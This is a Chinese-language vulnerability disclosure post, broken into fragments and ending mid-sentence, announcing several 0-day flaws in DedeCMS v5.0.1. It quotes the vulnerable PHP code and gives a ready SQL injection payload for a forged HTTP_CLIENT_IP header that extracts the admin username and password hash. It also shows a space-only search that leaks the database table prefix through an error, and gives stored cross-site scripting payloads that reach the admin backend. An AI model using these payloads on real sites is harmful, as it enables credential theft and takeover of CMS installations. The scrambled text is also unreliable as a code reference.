Dedecms v501多个0day漏洞暴光

1、Dedecms v5.0.1多个0day漏洞暴光Flyh4t漏洞一：又见getiP()比较经典的一段漏洞代码出现includeinc_functions.php中数次将这个函数的结果直接入库，造成了很多处注射漏洞。当然，这个漏洞在dedecms4中也一直存在 ：）-/includeinc_functions.phpfunction GetIP()/该函数中的$_SERVER变量没有过滤，而且php5环境下不受gpc 影响if(!empty($_SERVER"HTTP_CLIENT_IP") $cip = $_SERVER"HTTP_CLIENT_IP"e

2、lse if(!empty($_SERVER"HTTP_X_FORWARDED_FOR") $cip = $_SERVER"HTTP_X_FORWARDED_FOR"else if(!empty($_SERVER"REMOTE_ADDR") $cip = $_SERVER"REMOTE_ADDR"else $cip = "无法获取！"return $cip;-这个类型的漏洞已经很多了，我不再详细写了，只拿其中一处写了个poc方面理解：）-/ memberstory_add_action.php

3、(30) $userip = getip();$inQuery = "INSERT INTO #_story_books(catid,bcatid,booktype,iscommend,click,freenum,bookname,author,memberid,litpic,pubdate,ischeck,status,lastpost,postnum,lastfeedback,fedbacknum,weekcc,monthcc,weekup,monthup,description,body,keywords,userip,senddate )VALUES ('$catid

4、','$bcatid','$booktype', '$iscommend', '0', '$freenum', '$bookname', '$author', '$cfg_ml->M_ID', '$litpic', '$pubdate', '$ischeck', '0', '0', '0', '0', '0', '0&#

5、39;, '0', '0', '0', '$description' , '$body' , '$keywords', '$userip','".mytime()."');"10-只要伪造HTTP_CLIENT_IP 为11','1173448061'),('1', '0', '0', '0', '1', &#

6、39;6',(SELECT concat( userid, 0x5f, pwd, 0x5f, uname ) FROM dede_admin WHERE id =1), 'flyh4t', '3', '0', '1173448047', '1', '0', '0', '1', '0', '0', '0', '0', '0', '0', 'flyh4t'

7、;, 'flyh4t', 'flyh4t', ' 即可以注射这个漏洞了（不过这里要求mysql4>=4.1，这个版本以上的支持子查询），具体的参考群共享里面的poc.。（dedecms_0day_poc.php）漏洞二：暴数据库表前缀这个漏洞和漏洞一是天生的一对，在用户修改了了表前缀的情况下我们的sql注射很难利用起来，但是这个漏洞给了我们一个机会 ：） 看代码：-/plus/search.php$keyword = stripslashes($keyword);/还原被gpc转掉的变量值$keyword = ereg_repla

8、ce("|"rnt%*?()$;,'%-"," ",trim($keyword);/将敏感的符号替换为空格，注意，是空格而不是空if( ($cfg_notallowstr!='' && eregi($cfg_notallowstr,$keyword) | ($cfg_replacestr!='' && eregi($cfg_replacestr,$keyword) )echo "你的信息中存在非法内容，被系统禁止！<a href='javascrip

9、t:history.go(-1)'>返回</a>" exit();if($keyword=""|strlen($keyword)<3)ShowMsg("关键字不能小于3个字节！","-1");exit();/上面这个判断犯了逻辑上的错误，简单的说：三个空格的长度并不小于三$sp = new SearchView($typeid,$keyword,$channelid,$searchtype,$kwtype,$cacheid);/进行搜索-下面我们来看SearchView类里面两个函数-incl

10、udeinc_arcsearch_view.php function GetKeywordSql() $where = array(); $ks = explode(" ",$this->Keywords); sort($ks);reset ($ks); $kwsqlarr = array(); foreach($ks as $k) $k = trim($k); if(strlen($k)<2) continue; $k = addslashes($k); if($this->SearchType != "titlekeyword")

11、$kwsqlarr = " #_full_search.title like '%$k%' " else $kwsqlarr = " #_full_search.title like '%$k%' " $kwsqlarr = " #_full_search.addinfos like '%$k%' " $kwsqlarr = " #_full_search.keywords like '%$k%' " if($this->KType=1)$whe

12、re = implode(' AND ',$kwsqlarr);else$where = implode(' OR ',$kwsqlarr); $wheresql = implode(' AND ',$where); return $wheresql;/折腾了好久，我们的keyword如果像上面我们想的那样被被过滤成三个以上的空格，这个得到的$wheresql就是空的 -接着看-includeinc_arcsearch_view.php function CountRecord() if(empty($this->cacheid)$wher

13、e = $this->GetKeywordSql();/该值可以为空$query = "Select aid from #_full_search where $where limit $cfg_search_maxlimit" /$where为空就会发生语法错误-我们提交搜索关键字为 %测试看看，如下图图一提示错误：You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to us

14、e near 'limit 500' at line 1 - Execute Query False! Select aid from dede_full_search where limit 500我们轻松的知道了表前缀是dede_漏洞三：跨站跨遍前后台1、 前台跨站在给用户留言的地方过滤不严，可以在留言内容里直接写script代码。Poc: 留言内容填写<script>javascript:alert("flyh4t")</script> ，当用户看留言时就执行了代码，如下图图二2、 后台跨站在用户填写个人说明的地方过滤不严，存在跨站漏洞，该漏洞可以跨到后台Poc: 在个人说明处填写test</textarea><script>javascript:alert("flyh4t")</script>当管理员进